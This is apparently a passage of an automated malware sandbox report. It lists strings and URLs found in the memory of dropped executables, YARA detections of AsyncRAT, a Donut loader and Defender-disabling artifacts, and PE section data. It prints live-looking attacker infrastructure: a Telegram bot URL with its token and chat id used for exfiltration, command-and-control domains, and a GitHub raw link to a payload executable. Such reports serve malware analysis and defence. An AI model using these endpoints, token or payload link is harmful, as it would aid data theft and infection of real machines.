                    Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
                    Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
                    Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                    Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                    Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                    Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                    Source: vQeyqr1.exe, 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, vQeyqr1.exe, 0000000E.00000002.4661857196.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, vQeyqr1.exe, 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: 0064eff6c8.exe, 00000012.00000002.3072593719.0000000000409000.00000002.00000001.01000000.0000000E.sdmp, 0064eff6c8.exe, 00000012.00000000.3046784847.0000000000409000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: powershell.exe, 00000015.00000002.3301643124.000001E69006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3631734294.0000020C346FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                    Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0
                    Source: powershell.exe, 00000032.00000002.3512935571.0000020C248B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: vQeyqr1.exe, 0000000E.00000002.4661857196.000000000324D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3243887590.000001E680228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3512935571.0000020C248B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: RzAAR0y.exe, 0000000B.00000002.4675040044.000001AC39141000.00000004.00000800.00020000.00000000.sdmp, vQeyqr1.exe, 0000000E.00000002.4661857196.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3243887590.000001E680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3512935571.0000020C24691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: vQeyqr1.exe, 0000000E.00000002.4661857196.000000000324D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3243887590.000001E680228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3512935571.0000020C248B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: 28d287a54d.exe, 0000000D.00000000.2915653913.0000000000423000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
                    Source: powershell.exe, 00000032.00000002.3512935571.0000020C248B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com0
                    Source: powershell.exe, 00000032.00000002.3673297976.0000020C3CE85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.P
                    Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
                    Source: powershell.exe, 00000015.00000002.3334972035.000001E6EC1BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.t.com/pk
                    Source: powershell.exe, 00000015.00000002.3243887590.000001E680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3512935571.0000020C24691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: skotes.exe, 00000009.00000002.4668807005.00000000015F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.libertyreserve.com/beta/xml/transfer.aspx
                    Source: vQeyqr1.exe, 0000000E.00000002.4661857196.0000000002FFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: vQeyqr1.exe, 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, vQeyqr1.exe, 0000000E.00000002.4661857196.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp, vQeyqr1.exe, 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: vQeyqr1.exe, 0000000E.00000002.4661857196.0000000002FFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8174428401:AAHxlGtOg4tsy0J0kYm7h8822BuHfnk8vKQ/sendMessage?chat_id=14349
                    Source: powershell.exe, 00000032.00000002.3631734294.0000020C346FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000032.00000002.3631734294.0000020C346FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000032.00000002.3631734294.0000020C346FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: 950932ab59.exe, 00000034.00000002.3514958295.000000000150B000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000003.3458308983.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000003.3459174810.000000000150A000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000003.3458308983.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000002.3513585853.00000000014E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/
                    Source: 950932ab59.exe, 00000034.00000002.3512326183.000000000149E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/M
                    Source: 950932ab59.exe, 00000034.00000003.3458308983.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000002.3513585853.00000000014E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/S
                    Source: 950932ab59.exe, 00000034.00000002.3512326183.000000000149E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/V
                    Source: 950932ab59.exe, 00000034.00000002.3517224743.0000000001563000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000003.3458081477.0000000001563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/_;
                    Source: 950932ab59.exe, 00000034.00000003.3458308983.00000000014FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/api
                    Source: 950932ab59.exe, 00000034.00000003.3459174810.000000000152D000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000002.3516065712.000000000152D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apip
                    Source: skotes.exe, 00000009.00000002.4668807005.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3988275528.00000000015AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com
                    Source: powershell.exe, 00000032.00000002.3512935571.0000020C248B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: skotes.exe, 00000009.00000002.4668807005.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3988275528.00000000015AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Urijas/moperats/raw/refs/heads/main/biyjdfjadaw.exe
                    Source: powershell.exe, 00000015.00000002.3334972035.000001E6EC1BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
                    Source: powershell.exe, 00000015.00000002.3301643124.000001E69006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3631734294.0000020C346FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: skotes.exe, 00000009.00000002.4668807005.00000000015F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sci.libertyreserve.com/
                    Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                    Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ssl.com/repository0

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: Yara matchFile source: 14.2.vQeyqr1.exe.1e610000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.vQeyqr1.exe.1e610000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeWindow created: window name: CLIPBRDWNDCLASS

                    Operating System Destruction

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: 01 00 00 00

                    System Summary

                    barindex
                    Source: 11.2.RzAAR0y.exe.1ac390b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 14.2.vQeyqr1.exe.1e610000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                    Source: 14.2.vQeyqr1.exe.1e730000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 14.0.vQeyqr1.exe.ca0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 14.2.vQeyqr1.exe.1470000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                    Source: 14.2.vQeyqr1.exe.1470000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                    Source: 14.2.vQeyqr1.exe.1e730000.3.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 14.2.vQeyqr1.exe.1e610000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                    Source: 0000000B.00000002.4672951353.000001AC390B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                    Source: 0000000E.00000002.4646618680.0000000001470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                    Source: 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0000000B.00000002.4639753741.000001AC373B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeFile dump: service123.exe.24.dr 314617856Jump to dropped file
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: skotes.exe.1.drStatic PE information: section name:
                    Source: skotes.exe.1.drStatic PE information: section name: .idata
                    Source: random[1].exe.9.drStatic PE information: section name:
                    Source: random[1].exe.9.drStatic PE information: section name: .idata
                    Source: random[1].exe.9.drStatic PE information: section name:
                    Source: 22b0b7688f.exe.9.drStatic PE information: section name:
                    Source: 22b0b7688f.exe.9.drStatic PE information: section name: .idata
                    Source: 22b0b7688f.exe.9.drStatic PE information: section name:
                    Source: random[1].exe0.9.drStatic PE information: section name:
                    Source: random[1].exe0.9.drStatic PE information: section name: .idata
                    Source: random[1].exe0.9.drStatic PE information: section name:
                    Source: 950932ab59.exe.9.drStatic PE information: section name:
                    Source: 950932ab59.exe.9.drStatic PE information: section name: .idata
                    Source: 950932ab59.exe.9.drStatic PE information: section name:
                    Source: random[3].exe.9.drStatic PE information: section name:
                    Source: random[3].exe.9.drStatic PE information: section name: .idata
                    Source: random[3].exe.9.drStatic PE information: section name:
                    Source: b93717638f.exe.9.drStatic PE information: section name:
                    Source: b93717638f.exe.9.drStatic PE information: section name: .idata
                    Source: b93717638f.exe.9.drStatic PE information: section name:
                    Source: random[2].exe2.9.drStatic PE information: section name:
                    Source: random[2].exe2.9.drStatic PE information: section name: .idata
                    Source: random[2].exe2.9.drStatic PE information: section name:
                    Source: 92133eb3c2.exe.9.drStatic PE information: section name:
                    Source: 92133eb3c2.exe.9.drStatic PE information: section name: .idata
                    Source: 92133eb3c2.exe.9.drStatic PE information: section name:
                    Source: random[3].exe0.9.drStatic PE information: section name:
                    Source: random[3].exe0.9.drStatic PE information: section name: .idata
                    Source: random[3].exe0.9.drStatic PE information: section name:
                    Source: 224de4e34e.exe.9.drStatic PE information: section name:
                    Source: 224de4e34e.exe.9.drStatic PE information: section name: .idata
                    Source: 224de4e34e.exe.9.drStatic PE information: section name:
                    Source: random[4].exe.9.drStatic PE information: section name:
                    Source: random[4].exe.9.drStatic PE information: section name: .idata
                    Source: 22b355416f.exe.9.drStatic PE information: section name:
                    Source: 22b355416f.exe.9.drStatic PE information: section name: .idata
                    Source: random[3].exe1.9.drStatic PE information: section name:
                    Source: random[3].exe1.9.drStatic PE information: section name: .idata
                    Source: 2002c77d6d.exe.9.drStatic PE information: section name:
                    Source: 2002c77d6d.exe.9.drStatic PE information: section name: .idata
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeFile created: C:\Windows\MpForgotten
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeFile created: C:\Windows\TabletAction
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeFile created: C:\Windows\CommunityProduction
                    Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeFile created: C:\Windows\ExtractNicholas
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB78BB1_2_00EB78BB
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB88601_2_00EB8860
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB70491_2_00EB7049
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB31A81_2_00EB31A8
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E74B301_2_00E74B30
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E74DE01_2_00E74DE0
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB2D101_2_00EB2D10
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB779B1_2_00EB779B
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EA7F361_2_00EA7F36
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_004B70492_2_004B7049
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_004B88602_2_004B8860
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_004B78BB2_2_004B78BB
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_004B31A82_2_004B31A8
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00474B302_2_00474B30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_004B2D102_2_004B2D10
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00474DE02_2_00474DE0
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_004A7F362_2_004A7F36
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_004B779B2_2_004B779B
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_0047E5309_2_0047E530
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_004961929_2_00496192
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_004B88609_2_004B8860
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_00474B309_2_00474B30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_004B2D109_2_004B2D10
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_00474DE09_2_00474DE0
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_00490E139_2_00490E13
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_004B70499_2_004B7049
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_004B31A89_2_004B31A8
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_004916029_2_00491602
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_004B779B9_2_004B779B
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_004B78BB9_2_004B78BB
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_00493DF19_2_00493DF1
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_004A7F369_2_004A7F36
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeProcess token adjusted: Security
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0048DF80 appears 64 times
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 004A8E10 appears 35 times
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0048D64E appears 66 times
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0048D942 appears 85 times
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0048D663 appears 39 times
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 004880C0 appears 263 times
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00487A00 appears 38 times
                    Source: C:\Users\user\Desktop\file.exeCode function: String function: 00E880C0 appears 130 times
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5208 -s 784
                    Source: 003.exe.9.drStatic PE information: No import functions for PE file found
                    Source: 003[1].exe.9.drStatic PE information: No import functions for PE file found
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 11.2.RzAAR0y.exe.1ac390b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 14.2.vQeyqr1.exe.1e610000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                    Source: 14.2.vQeyqr1.exe.1e730000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 14.0.vQeyqr1.exe.ca0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 14.2.vQeyqr1.exe.1470000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                    Source: 14.2.vQeyqr1.exe.1470000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                    Source: 14.2.vQeyqr1.exe.1e730000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 14.2.vQeyqr1.exe.1e610000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                    Source: 0000000B.00000002.4672951353.000001AC390B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                    Source: 0000000E.00000002.4646618680.0000000001470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                    Source: 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0000000B.00000002.4639753741.000001AC373B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: random[4].exe0.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9977967472752044
                    Source: skotes.exe.1.drStatic PE information: Section: ZLIB complexity 0.9977967472752044
                    Source: random[1].exe.9.drStatic PE information: Section: hkbprtow ZLIB complexity 0.9944030100185397
                    Source: 22b0b7688f.exe.9.drStatic PE information: Section: hkbprtow ZLIB complexity 0.9944030100185397
                    Source: random[1].exe0.9.drStatic PE information: Section: ZLIB complexity 0.9973445526541096
                    Source: random[1].exe0.9.drStatic PE information: Section: lzigcvvj ZLIB complexity 0.9945462015898131
                    Source: 950932ab59.exe.9.drStatic PE information: Section: ZLIB complexity 0.9973445526541096
                    Source: 950932ab59.exe.9.drStatic PE information: Section: lzigcvvj ZLIB complexity 0.9945462015898131
                    Source: random[2].exe0.9.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                    Source: random[2].exe0.9.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                    Source: ca733a156b.exe.9.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                    Source: ca733a156b.exe.9.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                    Source: random[3].exe.9.drStatic PE information: Section: lvbdatvl ZLIB complexity 0.9941535782511534
                    Source: b93717638f.exe.9.drStatic PE information: Section: lvbdatvl ZLIB complexity 0.9941535782511534
                    Source: random[2].exe2.9.drStatic PE information: Section: gptxkuce ZLIB complexity 0.9902796749553969
